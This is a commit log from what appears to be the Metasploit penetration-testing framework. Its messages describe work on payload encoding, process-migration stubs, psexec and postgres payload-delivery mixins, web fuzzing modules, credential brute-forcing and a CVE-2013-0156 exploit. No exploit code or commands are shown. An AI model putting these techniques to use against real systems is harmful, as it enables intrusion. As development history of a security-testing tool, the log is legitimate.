2013-01-28 21:34:39 -06:00
sinn3r
9a58b7b732
Fix normalize_uri() function
...
This will make sure all the double slashes are gone. Also, the
function description is updated to clarify its purpose.
2013-01-28 12:10:21 -06:00
James Lee
3fc9b5d636
Doc cleanup
2013-01-28 00:01:45 -06:00
Tod Beardsley
2965fa480e
Some errant spaces
2013-01-25 05:41:28 -06:00
Tasos Laskos
a081389f86
Auxiliary::Web, Exploit::Remote::Web: style updates
2013-01-29 03:08:53 +02:00
Tasos Laskos
76e0305dcf
Merge remote-tracking branch 'upstream/master' into web-modules
2013-01-29 01:06:26 +02:00
scriptjunkie
d9e1653443
Use EXITFUNC if present to save space and be more correct.
...
Jump straight to payload on process failure to save space.
2013-01-24 17:14:25 -06:00
Tasos Laskos
9aaca2eae9
Auxiliary::Web::HTTP: updated exception handling
...
[FIXRM #7724 ]
Updated #run and #_requestto rescue and elog all exception.
2013-01-24 22:07:17 +02:00
Tasos Laskos
477ab65d55
Exploit::Remote::Web: added #tries method
...
#tries method indicates how many times we should run a module until
we establish a session.
2013-01-23 23:05:22 +02:00
James Lee
ff7756cd54
Make #prepends() actually work
2013-01-22 16:10:44 -06:00
Tasos Laskos
33e9f182bd
Merge remote-tracking branch 'upstream/master' into web-modules
2013-01-22 23:43:25 +02:00
Tasos Laskos
6b5c6c3a0c
Auxiliary::Web::Analysis::Differential
...
Removed payload option from #process_vulnerability call
2013-01-22 23:41:36 +02:00
Tasos Laskos
0d564c1ce8
Auxiliary::Web::Analysis::Timing
...
Updated to pick the largest matching payload from the payload list.
2013-01-22 23:40:30 +02:00
Tasos Laskos
f2beb5bf19
Auxiliary::Web#process_vulnerability: payload fix
...
Updated to pick the largest matching payload from the payload list.
2013-01-22 23:39:16 +02:00
James Lee
c37510f777
Move prependmigrate.rb for naming consistency
2013-01-22 14:15:52 -06:00
James Lee
04adaf0e9d
Unstupid the prepends callback
...
Windows#prepends was overriding PrependMigrate#prepends
2013-01-22 13:56:26 -06:00
James Lee
32aa2c6d9c
Make asm spacing easier to read
...
Also adds a #prepends callback to Payload::Windows to make it a little
clearer what's happening.
2013-01-22 13:25:27 -06:00
Tasos Laskos
fed4a836c6
Updated proof string for Web Differential Analysis
...
Manipulatable responses => Boolean manipulation
2013-01-22 20:29:57 +02:00
Royce Davis
81625121f2
Cleaned up some code spacing
2013-01-22 09:49:03 -06:00
Raphael Mudge
4740cb09a1
Fix NoMethodError if handler has no ParentModule
...
db.rb assumes that multi/handler sessions have a ParentModule defined
in their datastore. This assumption breaks when a user sets up a
multi/handler by hand to receive a session from another user (e.g.,
via multi_meter_inject).
When db.rb tries to access a member of a nil ParentModule, a
stacktrace is dumped to framework.log.
2013-01-22 02:56:43 -05:00
kernelsmith
52596ae3b4
add -R capability like hosts -R
...
moves the set_rhosts method def out into a separate file so it can be
included by both db.rb cmd_hosts and core.rb cmd_grep
2013-01-21 18:17:28 -06:00
jvazquez-r7
b2c7223108
Cleanup for mysql_file_enum.rb
2013-01-21 12:26:35 +01:00
Robin Wood
23d1eb7a80
File/dir brute forcer using MySQL
2013-01-20 21:23:58 +00:00
scriptjunkie
66d5f39057
Ensure prepend_migrate? always functions correctly.
2013-01-18 18:04:09 -06:00
scriptjunkie
6c046dfa69
Move PrependMigrate to a mixin
2013-01-18 17:45:36 -06:00
scriptjunkie
07bf36f62f
Ensure shell still works if PrependMigrateProc fails to launch.
...
Don't rely on GetStartupInfoA return value.
2013-01-18 17:32:50 -06:00
scriptjunkie
52251867d8
Ensure Windows single payloads use payload backend
...
This means the singles that define their own assembly will use the payload backend to generate it.
2013-01-18 16:34:39 -06:00
scriptjunkie
16d065adfc
Fix issue with singles.
...
Single now plays more nicely with other mixins, so PrependMigrate works.
2013-01-18 16:34:39 -06:00
scriptjunkie
b01374904b
tidy EOL spaces
2013-01-18 16:34:39 -06:00
scriptjunkie
15268cae73
Add X64 PrependMigrate support
2013-01-18 16:34:39 -06:00
scriptjunkie
c97be836c3
Fix error calculating payload sizes.
...
Error meant most Windows payloads were marked as incompatible with many exploits.
2013-01-18 16:34:39 -06:00
scriptjunkie
725d4d7194
Re-use block_api code in migrate stub if possible
...
Makes payload significantly smaller.
2013-01-18 16:34:38 -06:00
scriptjunkie
0b32111a9f
Revert "Revert "Merge branch 'migrator' of git://github.com/scriptjunkie/metasploit-framework into scriptjunkie-migrator""
...
This reverts commit 2436ac3a58
.
2013-01-18 16:34:38 -06:00
Royce Davis
a2f66a8fef
Fixed msftidy complaints
2013-01-18 09:33:44 -06:00
Royce Davis
00a9c72595
Fixed exception handeling. No longer using rescure StandardError
2013-01-17 19:02:13 -06:00
kernelsmith
6e8e7a407d
adds a .nil? check as well
2013-01-17 00:30:58 -06:00
kernelsmith
7090a4a82f
adds check for empty data b4 sending to parser [RM7269]
...
[fixes RM7269]
we discussed the solution to this bug a lot on IRC and in the ticket
itself, the consensus was to fix it as far upstream as possible before
sending to the parsers so as to avoid any future bugs of the same
nature, so this commit adds a check to import_nmap_xml to see if the
data is empty before passing it on to the parser, whether that parser
is nokogiri or the legacy parser.
db_nmap -h now produces the expected output and db_nmap still works as
expected.
2013-01-17 00:18:13 -06:00
Royce Davis
f7571d89de
Fixed cleanup_after funciton to mimic file_dropper but not use file_dropper
2013-01-16 09:56:27 -06:00
sinn3r
c621e83ffe
Merge branch 'feature/stage_encoding' of github.com:jlee-r7/metasploit-framework into jlee-r7-feature/stage_encoding
2013-01-15 23:31:40 -06:00
Royce Davis
6773a10632
Made changes to cleanup to use file_dropper instead
2013-01-15 16:24:16 -06:00
James Lee
26b40666ce
Merge branch 'rapid7' into feature/stage_encoding
2013-01-15 15:10:58 -06:00
Royce Davis
7361e1041f
Merge commit '5e8f388ab8425bf2ef4c2fe33e6133b99ceb46d4' into psexec-mixin2
2013-01-15 14:49:21 -06:00
Royce Davis
6f17ed96db
Merge https://github.com/rapid7/metasploit-framework into psexec-mixin2
2013-01-15 14:48:20 -06:00
James Lee
af2b1ec25b
Clean up doc comments
2013-01-15 14:22:11 -06:00
James Lee
ee14c1c613
Merge remote-tracking branch 'R3dy/psexec-mixin2' into rapid7
2013-01-15 12:58:50 -06:00
James Lee
4883cf4b01
Minor doc comment additions
2013-01-15 12:49:43 -06:00
James Lee
d36e38fca6
Move encoding into handle_connection
...
* Allows payloads that override generate_stage to still take advantage
of stage encoding
* Also adds doc comments for a few methods
2013-01-15 10:34:31 -06:00
Tod Beardsley
6064dfcb71
Merge remote-tracking branch 'wchen-r7/fail_to_reload_fix'
2013-01-15 01:43:07 -08:00
James Lee
a1e853500f
Merge branch 'bug/optint_empty' into feature/stage_encoding
2013-01-14 15:50:39 -06:00
James Lee
21c18b78e6
Don't bother nil check, to_s handles it
2013-01-14 15:47:58 -06:00
James Lee
0c90171fa7
Deal with alread-normalized ints
...
[See #1308 ][See #1304 ]
2013-01-14 15:31:14 -06:00
James Lee
fb19ec1005
Merge branch 'rapid7' into feature/stage_encoding
2013-01-14 15:20:23 -06:00
sinn3r
b2ecb18a71
Allow OptInt to pass "" for special reasons
...
Cheap fix
2013-01-14 14:55:48 -06:00
James Lee
bbb3fa25be
Allow negative values for OptInt
...
[FixRM #7540 ]
2013-01-14 14:18:56 -06:00
James Lee
b3b68c1b90
Make stage encoding possible
...
* Fixes a bug in shikata where input greater than 0xffff length would
still use 16-bit counter
* Short circuits finding bad xor keys if there are no bad characters to
avoid
* Fixes huge performance issue with large inputs to xor-based encoders
due to the use of String#+ instead of String#<< in a loop. It now
takes ~3 seconds on modern hardware to encode a 750kB buffer with
shikata where it used to take more than 10 minutes. The decoding side
takes a similar amount of time and will increase the wait between
sending the second stage and opening a usable session by several
seconds.
I believe this addresses the intent of pull request 905
[See #905 ]
2013-01-13 21:07:39 -06:00
James Lee
0d34e0b249
Fix regex for hex numbers
2013-01-13 20:53:40 -06:00
Spencer McIntyre
b178ce1895
allow the mixin to auto detect an available decoder binary
2013-01-12 17:31:11 -05:00
James Lee
4703a6f737
Unbreak OptInt hex syntax
...
* Fix spec for no-longer-pending tests
* Fix regex in OptInt#valid? to allow hex syntax again
[See #1293 ][See #1296 ]
2013-01-12 14:17:29 -06:00
sinn3r
b388f2357c
Reset modules_cached flag when database disconnects
2013-01-12 00:08:30 -06:00
HD Moore
06fb8f5443
Merge pull request #1293 from wchen-r7/optint_valid
...
Fix OptInt's valid?() function
2013-01-11 17:29:27 -08:00
sinn3r
8c04df4a47
[FixRM: #7535 ] Missing normalize() in OptPort
...
[FixRM: #7535 ] - Sometimes OptPort can return as a String instead
of Fixnum because OptPort is missing the normalize() function.
2013-01-11 18:34:27 -06:00
sinn3r
0347b173eb
Fix OptInt's valid?() function
...
[FixRM #7539 ] - The valid?() function will first normalize() the
user-supplied input before validation. The problem is that the
normalize() function will ALWAYS convert data to integer, therefore
whatever you validate, you will always get true. For example:
when I do "yomama".to_i, that returns 0, and of course will pass
integer validation.
2013-01-11 16:27:33 -06:00
Spencer McIntyre
ce4aa606e7
change DECODER OptString to OptEnum per egypt's recommendation
2013-01-11 14:34:23 -05:00
sinn3r
aa36b65aee
[FixRM #7673 ] "Failed to reload" error.
...
When db_disconnect is issued, this funtion does not update the status
of self.migrated to false. So when another reload command is used,
the update_module_details function will still try to connect to the
database, which causes the "Failed to reload" error.
2013-01-11 01:10:56 -06:00
Royce Davis
b702263bbf
Added fix form Eric Milam to simple.disconnect
2013-01-10 16:33:03 -06:00
Spencer McIntyre
4c87b1ba36
escape ticks and spaces in paths
2013-01-10 09:15:24 -05:00
HD Moore
4c1e501ed0
Exploit for CVE-2013-0156 and new ruby-platform modules
2013-01-09 23:10:13 -06:00
Royce Davis
13140d05b1
Added some methods for checkout output and cleanup
2013-01-09 21:14:19 -06:00
sinn3r
a158611c95
Merge branch 'tasos-r7-web-modules'
2013-01-09 16:14:16 -06:00
sinn3r
8b25599feb
Merge branch 'web-modules' of github.com:tasos-r7/metasploit-framework into tasos-r7-web-modules
2013-01-09 16:14:04 -06:00
jvazquez-r7
7a1a9985d5
Merge branch 'mysql_login_exceptions' of https://github.com/wchen-r7/metasploit-framework into wchen-r7-mysql_login_exceptions
2013-01-09 18:21:03 +01:00
sinn3r
6490af720b
Make failures more verbose so people know what's going on
2013-01-09 11:11:26 -06:00
Tasos Laskos
5ac6060fc1
Auxiliary::Web::HTTP_request: Updated to return an empty response on reset connections
2013-01-09 19:06:51 +02:00
Tasos Laskos
74cdd918af
Auxiliary::Web::HTTP#run: don't allow connection or callback errors to abort the whole operation
2013-01-09 18:38:09 +02:00
Spencer McIntyre
d79a3c8e6b
list valid DECODER values and add the sshexec module
2013-01-09 10:27:22 -05:00
Royce Davis
c262288541
Fixed msftidy issues
2013-01-08 15:35:20 -06:00
Royce Davis
3e1ea25207
Added Yard documentation
2013-01-08 15:20:13 -06:00
James Lee
95a95d45ec
Fix importing msfxml files containing a session
...
[See #1179 ][SeeRM #7669 ]
2013-01-08 12:13:20 -06:00
Royce Davis
c236e4e6e3
I took a stab at generating Yard documentation. I have never done it before...
2013-01-08 11:57:59 -06:00
Royce Davis
4fd196c0de
Fixed typo, capitalization and column space
2013-01-08 11:52:40 -06:00
sinn3r
824bd84990
I forgot to add this exception
2013-01-07 18:06:39 -06:00
sinn3r
fc48cc117d
Merge branch 'bug/rm7665-netsparker-import' of github.com:jlee-r7/metasploit-framework into jlee-r7-bug/rm7665-netsparker-import
2013-01-07 17:19:52 -06:00
James Lee
a0e6c7043b
Add actual cdata handler
...
Netsparker puts requests, responses, and info for vulns inside a cdata
(which makes sense because it's usually html snippets). This commit
handles that so report_web_vuln will actually be somewhat useful. Note
that the request is ignored by report_web_vuln despite there being a
place for it in the WebVuln model.
[SeeRM #7665 ]
2013-01-07 17:16:48 -06:00
sinn3r
5bc1066c69
Change how modules use the mysql login functions
2013-01-07 16:12:10 -06:00
sinn3r
261e095e5e
Handle exceptions in mysql_login
2013-01-07 16:02:59 -06:00
sinn3r
268de941c7
Merge branch 'tasos-r7-web-modules'
2013-01-07 13:37:32 -06:00
sinn3r
b53e8c794f
Fix indent level
2013-01-07 13:36:55 -06:00
Royce Davis
7dd9d30363
Added a new mixin psexec.rb
2013-01-07 11:05:23 -06:00
Rob Fuller
986435c598
Fix typo
...
Typo found by @schierlm but mentioned after the commit of pull request #1187
Info: https://github.com/rapid7/metasploit-framework/pull/1187#commitcomment-2340457
2013-01-06 01:47:15 -05:00
Tasos Laskos
e1885cab0b
Merge remote-tracking branch 'upstream/master' into web-modules
2013-01-04 21:33:17 +02:00
Tasos Laskos
3d4d6e9860
Crawler aux mixin updated to catch the mysterious and anonymous timeout exception and re-raise it as a Timeout::Error
2013-01-04 21:32:18 +02:00
sinn3r
d17a6f99e5
Merge branch 'feature/deprecated-module-mixin' of github.com:jlee-r7/metasploit-framework into jlee-r7-feature/deprecated-module-mixin
2013-01-04 00:38:01 -06:00
jvennix-r7
2f0e4cbd39
Merge pull request #1179 from rapid7/bug/bap-compro-hosts
...
Changes to BAP session storage
2013-01-03 14:27:13 -08:00
James Lee
d9947a1515
Add a mixin for marking deprecated modules
...
* This mixin standardizes the previously ad-hoc deprecation warnings on
modules that have been moved.
* Uses the mixin in 3 existing modules that already have (or should have
had) deprecation warnings.
2013-01-02 19:14:44 -06:00
Spencer McIntyre
3c039327c0
include the new mixin
2013-01-02 13:41:57 -05:00
Spencer McIntyre
7aed6e44e1
Initial commit of the Bourne shell command stager, nothing uses it yet.
2013-01-02 13:28:08 -05:00
Daniele Martini
dcae55e348
Give auth_brute ability to try credentials stored in db
...
Added two options:
DB_USER_PASS: this will try each user/pass couple stored in the db
DB_ADD_ALL: this will add each user and password to the lists.
By setting this to true, auth_brute will try every user with
every known password.
2012-12-28 18:55:05 +01:00
sinn3r
d2dc7ebc2d
Merge branch 'feature/windows-postgres-payload-dll' of git://github.com/jlee-r7/metasploit-framework into jlee-r7-feature/windows-postgres-payload-dll
2012-12-26 11:18:21 -06:00
Tod Beardsley
179e4cf870
Moving up to 4.6.0-dev
2012-12-24 08:40:29 -06:00
James Lee
20cc2fa38d
Make Windows postgres_payload more generic
...
* Adds Exploit::EXE to windows/postgres/postgres_payload. This gives us
the ability to use generate_payload_dll() which generates a generic dll
that spawns rundll32 and runs the shellcode in that process. This is
basically what the linux version accomplishes by compiling the .so on
the fly. On major advantage of this is that the resulting DLL will
work on pretty much any version of postgres
* Adds Exploit::FileDropper to windows version as well. This gives us
the ability to delete the dll via the resulting session, which works
because the template dll contains code to shove the shellcode into a
new rundll32 process and exit, thus leaving the file closed after
Postgres calls FreeLibrary.
* Adds pre-auth fingerprints for 9.1.5 and 9.1.6 on Ubuntu and 9.2.1 on
Windows
* Adds a check method to both Windows and Linux versions that simply
makes sure that the given credentials work against the target service.
* Replaces the version-specific lo_create method with a generic
technique that works on both 9.x and 8.x
* Fixes a bug when targeting 9.x; "language C" in the UDF creation query
gets downcased and subsequently causes postgres to error out before
opening the DLL
* Cleans up lots of rdoc in Exploit::Postgres
2012-12-22 00:30:09 -06:00
sinn3r
9b768a2c62
Merge branch 'cleanup/post-windows-services' of git://github.com/jlee-r7/metasploit-framework into jlee-r7-cleanup/post-windows-services
2012-12-21 23:42:17 -06:00
David Maloney
be7da83feb
Adds EHLO domain to smtp deliver
...
Allow the user to set the EHLO domain for the smtp deliver module.
This is needed for Pro functionality
[story #41549217 ]
2012-12-21 14:22:21 -06:00
Tod Beardsley
2bb7b5ea11
Fixes error message for badchar
...
Note that only a custom module that allows for users to pass arguments
to nmap would be capable of hitting the error condition. Right now, only
auxiliary/scanner/oracle/oracle_login traverses the codepath, and that
doesn't allow for arbitrary args passed to nmap.
So... without contriving an example, it should be impossible to
experience or test.
[FixRM #7641 ]
2012-12-21 09:59:54 -06:00
sinn3r
be85cf54ab
Why in a quote?
2012-12-20 10:47:23 -06:00
Sherif Eldeeb
f0991f3b3b
make "resp.body" as an advanced option
...
created a new advanced option "HttpUknownRequestResponse" that will be sent back in the HTML body of unknown requests instead of the old static "No site configured at this address" message.
2012-12-20 12:35:00 +03:00
sinn3r
4b56e3c862
Merge branch 'tasos-r7-web-modules'
2012-12-18 10:38:00 -06:00
Tod Beardsley
10511e8281
Merge remote branch 'origin/bug/fix-double-slashes'
...
Ran the new normalize_uri() specs, all passes, so I'm quite confident in
this change.
2012-12-17 13:29:19 -06:00
Samuel Huckins
4f3c6f973d
Changes to BAP session storage.
...
[SEERM #7294 ]
[Bug #40937817 ]
* exploit/multi/handler no longer filtered out from vuln creation and
other steps
* Name changed to parent module's name in session storage so we show something more helpful
than generic handler
* Same for vuln and attempt creation
2012-12-13 15:35:34 -06:00
sinn3r
f81ef9b68e
Merge branch 'bug/reload_all' of git://github.com/jlee-r7/metasploit-framework into jlee-r7-bug/reload_all
2012-12-13 12:33:39 -06:00
James Lee
d7f6b0c373
Remove vestiges of ModuleManager's ModuleSet origins
2012-12-13 11:23:49 -06:00
sinn3r
c0b214c287
Merge branch 'bindaddress' of git://github.com/corelanc0d3r/metasploit-framework into corelanc0d3r-bindaddress
2012-12-13 02:06:23 -06:00
Tod Beardsley
e762ca0d9b
Merge remote branch 'jlee-r7/midnitesnake-postgres_payload'
2012-12-12 15:30:56 -06:00
Tod Beardsley
0d8d5baf6d
Resolve merge conflict from jlee-r7
2012-12-12 14:24:47 -06:00
James Lee
6b4e021607
Make ModuleManager Enumerable
...
Fixes tools/module_* and probably some other lurking bugs
2012-12-12 13:41:04 -06:00
James Lee
a673c363fd
Use a more descriptive variable name
...
Also removes commented-out code.
2012-12-10 13:36:09 -06:00
James Lee
bc7cd4b452
Loop through module sets like super used to do
...
... since super doesn't exist any more.
Also changes to using ModuleSet#[] inside ModuleManager#[] instead of
ModuleSet#create to mimic original behavior when ModuleManager was a
subclass of ModuleSet.
2012-12-05 12:59:35 -06:00
Tasos Laskos
62782f0273
Auxiliary::Web::Fuzzable: removed confusing HTTP response status messages [SEERM #7586 ]
2012-12-05 18:49:07 +02:00
James Lee
77af4ba559
Missed a file in previous commit, thanks, travis!
2012-12-03 22:37:50 -06:00
James Lee
f4476cb1b7
Really fix payload recalculation
...
Instead of deleting all non-symbolics before the re-adding phase of
PayloadSet#recalculate, store a list of old module names, populate a
list of new ones during the re-adding phase, and finally remove any
non-symbolic module that was in the old list but wasn't in the new list.
Also includes a minor refactoring to make ModuleManager its own thing
instead of being an awkard subclass of ModuleSet. Now PayloadSet doesn't
need to know about the existence of framework.modules, which makes the
separation a little more natural.
[FixRM #7037 ]
2012-12-03 22:23:40 -06:00
Tasos Laskos
beffd1feda
Auxiliary::Web::Analysis::Taint#taint_analysis: added a bit of differential logic to avoid false positives in case the default responce matches the pattern we're looking for [FIXRM #7559 ]
2012-12-04 00:09:54 +02:00
Tasos Laskos
dafa984166
Auxiliary::Web::Fuzzable#submit: bugfixed to call http.request instead of http.request_async
2012-12-04 00:06:17 +02:00
Tasos Laskos
f6c27a4494
Auxiliary::Web#find_proof: updated doc comments
2012-12-04 00:05:12 +02:00
HD Moore
3ae47e2089
Move the thread tracking into the update method
2012-12-02 01:07:40 -06:00
HD Moore
51673ca152
Search reference values as well (ms08-067,etc)
2012-12-02 00:44:25 -06:00
HD Moore
f17ea91d7c
Whitespace changes only
2012-12-02 00:44:03 -06:00
James Lee
bc63ee9c46
Merge branch 'jvazquez-r7-file_dropper_support_local' into rapid7
2012-11-30 13:43:02 -06:00
James Lee
1da3388194
Fix missing require
...
[Closes #1106 ]
2012-11-30 13:42:31 -06:00
HD Moore
fee6ad9799
Bump to 4.5.0-release for testing
2012-11-30 11:04:23 -08:00
jvazquez-r7
087ff328b6
correct comments documentation
2012-11-28 22:18:56 +01:00
jvazquez-r7
17518f035c
support for local exploits on file_dropper
2012-11-28 22:17:27 +01:00
Tod Beardsley
95f084b296
Use cvedetails not mitre.
2012-11-28 13:24:08 -06:00
James Lee
17d8d3692b
Merge branch 'rapid7' into midnitesnake-postgres_payload
2012-11-27 11:14:54 -06:00
Tasos Laskos
26b3b4577d
Merge remote-tracking branch 'upstream/master' into web-modules
2012-11-21 23:57:42 +02:00
Tasos Laskos
b656554769
Exploit::Remote::Web: moved status printing calls out of #perform_request and into #exploit
2012-11-21 23:28:26 +02:00
HD Moore
f5c7f4c41a
Remove trailing whitespace
2012-11-19 19:42:22 -06:00
sinn3r
527ba0e401
Merge branch 'feature/automatic-fs-cleanup' of git://github.com/jlee-r7/metasploit-framework into jlee-r7-feature/automatic-fs-cleanup
2012-11-19 15:59:19 -06:00
James Lee
2526dce20a
Add attrib.exe for removing read-only files
...
This really should be a standard part of session.fs.file.rm
2012-11-19 15:18:03 -06:00
sinn3r
d4749ff009
Merge branch 'feature/automatic-fs-cleanup' of git://github.com/jlee-r7/metasploit-framework into jlee-r7-feature/automatic-fs-cleanup
2012-11-16 19:02:46 -06:00